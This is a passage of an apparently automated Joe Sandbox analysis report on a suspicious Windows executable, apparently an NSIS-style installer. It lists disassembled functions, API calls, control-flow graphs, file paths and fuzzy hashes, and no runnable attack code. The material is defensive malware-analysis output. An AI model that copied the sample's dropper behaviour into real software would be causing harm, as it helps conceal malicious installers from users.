                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                      • String ID: %s%S.dll$UXTHEME$\
                                                                      • API String ID: 2200240437-1946221925
                                                                      • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                      • Instruction ID: 65f2176863960af248fb2a7cbd18121a9a3b282edca47cb762b3bdaa43f9a997
                                                                      • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                      • Instruction Fuzzy Hash: 14F0217050121967CB10AB68DD0DFDB376CA700304F10447AB547F10D1EBBDDA65CB98
                                                                      Function 00403116 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 161COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 919 403116-40312d 920 403136-40313f 919->920 921 40312f 919->921 922 403141 920->922 923 403148-40314d 920->923 921->920 922->923 924 40315d-40316a call 40330e 923->924 925 40314f-403158 call 403324 923->925 929 403170-403174 924->929 930 4032fc 924->930 925->924 931 4032a7-4032a9 929->931 932 40317a-4031a0 GetTickCount 929->932 933 4032fe-4032ff 930->933 934 4032e9-4032ec 931->934 935 4032ab-4032ae 931->935 936 403304 932->936 937 4031a6-4031ae 932->937 938 403307-40330b 933->938 939 4032f1-4032fa call 40330e 934->939 940 4032ee 934->940 935->936 941 4032b0 935->941 936->938 942 4031b0 937->942 943 4031b3-4031c1 call 40330e 937->943 939->930 952 403301 939->952 940->939 945 4032b3-4032b9 941->945 942->943 943->930 951 4031c7-4031d0 943->951 948 4032bb 945->948 949 4032bd-4032cb call 40330e 945->949 948->949 949->930 957 4032cd-4032d9 call 405e3f 949->957 954 4031d6-4031f6 call 4067d2 951->954 952->936 961 4031fc-40320f GetTickCount 954->961 962 40329f-4032a1 954->962 963 4032a3-4032a5 957->963 964 4032db-4032e5 957->964 965 403211-403219 961->965 966 40325a-40325c 961->966 962->933 963->933 964->945 967 4032e7 964->967 968 403221-403257 MulDiv wsprintfW call 4052ff 965->968 969 40321b-40321f 965->969 970 403293-403297 966->970 971 40325e-403262 966->971 967->936 968->966 969->966 969->968 970->937 972 40329d 970->972 974 403264-40326b call 405e3f 971->974 975 403279-403284 971->975 972->936 980 403270-403272 974->980 976 403287-40328b 975->976 976->954 979 403291 976->979 979->936 980->963 981 403274-403277 980->981 981->976
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CountTick$wsprintf
                                                                      • String ID: ... %d%%
                                                                      • API String ID: 551687249-2449383134
                                                                      • Opcode ID: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                      • Instruction ID: 204c6f4639eb8c290f7f343d6ac391169eef919077521cdf394e4ce58078bb87
                                                                      • Opcode Fuzzy Hash: e5ebdf3a3088b3206fd1fd2d7a2307a5c5a9c69b21f930b1953cca8bb268646f
                                                                      • Instruction Fuzzy Hash: 7A518931900219EBCB10DF65DA84A9F7FA8AB44366F1441BBED14B62C0D7789F50CBA9
                                                                      Function 004057CE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 982 4057ce-405819 CreateDirectoryW 983 40581b-40581d 982->983 984 40581f-40582c GetLastError 982->984 985 405846-405848 983->985 984->985 986 40582e-405842 SetFileSecurityW 984->986 986->983 987 405844 GetLastError 986->987 987->985
                                                                      APIs
                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                      • GetLastError.KERNEL32 ref: 00405825
                                                                      • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040583A
                                                                      • GetLastError.KERNEL32 ref: 00405844
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                      • String ID: C:\Users\user\Desktop
                                                                      • API String ID: 3449924974-3080008178
                                                                      • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                      • Instruction ID: 32cc50e607dd20b61f2ed470817bc290d965520901a5db6b5155953f1fdd03ed
                                                                      • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                                                      • Instruction Fuzzy Hash: B1010872C10619DADF00AFA1C9447EFBBB8EF14355F00803AD945B6281E77896188FA9
                                                                      Function 00405DBC Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 988 405dbc-405dc8 989 405dc9-405dfd GetTickCount GetTempFileNameW 988->989 990 405e0c-405e0e 989->990 991 405dff-405e01 989->991 993 405e06-405e09 990->993 991->989 992 405e03 991->992 992->993
                                                                      APIs
                                                                      • GetTickCount.KERNEL32 ref: 00405DDA
                                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\yVVZdG2NJX.exe",0040336A,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,004035B6), ref: 00405DF5
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CountFileNameTempTick
                                                                      • String ID: "C:\Users\user\Desktop\yVVZdG2NJX.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                      • API String ID: 1716503409-3304089906
                                                                      • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                      • Instruction ID: 33897e7ea40e9bcc5f45ceb9d35bf1368e2cdd1c67b8b6f6c5069f2428d8a25f
                                                                      • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                      • Instruction Fuzzy Hash: D4F03076610304FBEB009F69DD05F9FBBB8EB95710F10803AED40E7250E6B1AA54CBA4
                                                                      Function 703D177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 994 703d177b-703d17ba call 703d1b63 998 703d18da-703d18dc 994->998 999 703d17c0-703d17c4 994->999 1000 703d17cd-703d17da call 703d2398 999->1000 1001 703d17c6-703d17cc call 703d2356 999->1001 1006 703d17dc-703d17e1 1000->1006 1007 703d180a-703d1811 1000->1007 1001->1000 1010 703d17fc-703d17ff 1006->1010 1011 703d17e3-703d17e4 1006->1011 1008 703d1831-703d1835 1007->1008 1009 703d1813-703d182f call 703d256d call 703d15b4 call 703d1272 GlobalFree 1007->1009 1012 703d1837-703d1880 call 703d15c6 call 703d256d 1008->1012 1013 703d1882-703d1888 call 703d256d 1008->1013 1034 703d1889-703d188d 1009->1034 1010->1007 1014 703d1801-703d1802 call 703d2d2f 1010->1014 1016 703d17ec-703d17ed call 703d2a74 1011->1016 1017 703d17e6-703d17e7 1011->1017 1012->1034 1013->1034 1027 703d1807 1014->1027 1030 703d17f2 1016->1030 1022 703d17e9-703d17ea 1017->1022 1023 703d17f4-703d17fa call 703d2728 1017->1023 1022->1007 1022->1016 1033 703d1809 1023->1033 1027->1033 1030->1027 1033->1007 1037 703d188f-703d189d call 703d2530 1034->1037 1038 703d18ca-703d18d1 1034->1038 1044 703d189f-703d18a2 1037->1044 1045 703d18b5-703d18bc 1037->1045 1038->998 1040 703d18d3-703d18d4 GlobalFree 1038->1040 1040->998 1044->1045 1047 703d18a4-703d18ac 1044->1047 1045->1038 1046 703d18be-703d18c9 call 703d153d 1045->1046 1046->1038 1047->1045 1049 703d18ae-703d18af FreeLibrary 1047->1049 1049->1045
                                                                      APIs
                                                                        • Part of subcall function 703D1B63: GlobalFree.KERNEL32(?), ref: 703D1DB6
                                                                        • Part of subcall function 703D1B63: GlobalFree.KERNEL32(?), ref: 703D1DBB
                                                                        • Part of subcall function 703D1B63: GlobalFree.KERNEL32(?), ref: 703D1DC0
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D1829
                                                                      • FreeLibrary.KERNEL32(?), ref: 703D18AF
                                                                      • GlobalFree.KERNEL32(00000000), ref: 703D18D4
                                                                        • Part of subcall function 703D2356: GlobalAlloc.KERNEL32(00000040,?), ref: 703D2387
                                                                        • Part of subcall function 703D2728: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,703D17FA,00000000), ref: 703D27F8
                                                                        • Part of subcall function 703D15C6: lstrcpyW.KERNEL32(?,703D4020,00000000,703D15C3,?,00000000,703D1753,00000000), ref: 703D15DC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1598887120.00000000703D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 703D0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1598873256.00000000703D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598903143.00000000703D3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1598921247.00000000703D5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_703d0000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                      • String ID:
                                                                      • API String ID: 1791698881-3916222277
                                                                      • Opcode ID: 678d075bc1a40b6ab629da60371d05933412912d436d54b86cad1af6269a6162
                                                                      • Instruction ID: be20e2637595e1f7ce31f86eb87100b2acba9c4cf1801f5ad60fcb6bcf488131
                                                                      • Opcode Fuzzy Hash: 678d075bc1a40b6ab629da60371d05933412912d436d54b86cad1af6269a6162
                                                                      • Instruction Fuzzy Hash: 39419A73800305ABDB01DF30E984F8E77ADAB11311F144569FA4B9E396DBB89985DB60
                                                                      Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1051 4023e4-402415 call 402c41 * 2 call 402cd1 1058 402ac5-402ad4 1051->1058 1059 40241b-402425 1051->1059 1060 402427-402434 call 402c41 lstrlenW 1059->1060 1061 402438-40243b 1059->1061 1060->1061 1065 40243d-40244e call 402c1f 1061->1065 1066 40244f-402452 1061->1066 1065->1066 1067 402463-402477 RegSetValueExW 1066->1067 1068 402454-40245e call 403116 1066->1068 1072 402479 1067->1072 1073 40247c-40255d RegCloseKey 1067->1073 1068->1067 1072->1073 1073->1058 1076 40288b-402892 1073->1076 1076->1058
                                                                      APIs
                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 0040242F
                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040246F
                                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402557
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CloseValuelstrlen
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsg9061.tmp
                                                                      • API String ID: 2655323295-677182141
                                                                      • Opcode ID: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                      • Instruction ID: 82080937d165882f0efaaa77ae0bb3c7350c3cd8b3028382441b60bd8f3f090b
                                                                      • Opcode Fuzzy Hash: e4c63a464812e31c68653a2d561002cfdcec3cddba2e48d4c9e2fa9e1af61684
                                                                      • Instruction Fuzzy Hash: 60118171D00104BEEF10AFA5DE89EAEBAB4EB44754F11803BF504B71D1DBB88D419B28
                                                                      Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,00405C8B,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,C:\Users\user\AppData\Local\Temp\nsg9061.tmp,?,?,774D3420,004059C9,?,C:\Users\user\AppData\Local\Temp\,774D3420,00000000), ref: 00405C25
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C2A
                                                                        • Part of subcall function 00405C17: CharNextW.USER32(00000000), ref: 00405C42
                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                        • Part of subcall function 004057CE: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405811
                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne,?,00000000,000000F0), ref: 0040164D
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne, xrefs: 00401640
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                      • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\bayberry\krselsretningerne
                                                                      • API String ID: 1892508949-920775469
                                                                      • Opcode ID: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                      • Instruction ID: 83f66e59323efd8676d207054edf3c08df55f1f8244358cc2c8da33562713246
                                                                      • Opcode Fuzzy Hash: 54df887ae09462074095b126549abc23ab63c7b2394cf9b5eb7ef3472ce62764
                                                                      • Instruction Fuzzy Hash: 1811D031504500EBCF20BFA1CD0199E36A0EF15329B28493FFA45B22F1DB3E89919A5E
                                                                      Function 00405273 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • IsWindowVisible.USER32(?), ref: 004052A2
                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004052F3
                                                                        • Part of subcall function 0040425A: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040426C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                      • String ID:
                                                                      • API String ID: 3748168415-3916222277
                                                                      • Opcode ID: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                      • Instruction ID: beea61cd65c8703650dc93cdae6e0720761c29505c5582e3341eda9a3c117467
                                                                      • Opcode Fuzzy Hash: 1596ab6e3354de94528cf133c19516d9ce94324b0b8efb63eeb8625a5778ab08
                                                                      • Instruction Fuzzy Hash: BD01BC71200608AFEB208F11DD80AAB3B25EF85355F20807FFA01761D0C73A8C919F2E
                                                                      Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 0040205D
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000,?), ref: 00405337
                                                                        • Part of subcall function 004052FF: lstrlenW.KERNEL32(00403257,007A0F00,00000000,007924D8,774D23A0,?,?,?,?,?,?,?,?,?,00403257,00000000), ref: 00405347
                                                                        • Part of subcall function 004052FF: lstrcatW.KERNEL32(007A0F00,00403257,00403257,007A0F00,00000000,007924D8,774D23A0), ref: 0040535A
                                                                        • Part of subcall function 004052FF: SetWindowTextW.USER32(007A0F00,007A0F00), ref: 0040536C
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405392
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053AC
                                                                        • Part of subcall function 004052FF: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053BA
                                                                      • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 0040206E
                                                                      • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,?,000000F0), ref: 004020EB
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1553699186.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.1553666878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553785854.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1553904057.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1554579098.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_yVVZdG2NJX.jbxd
                                                                      Similarity
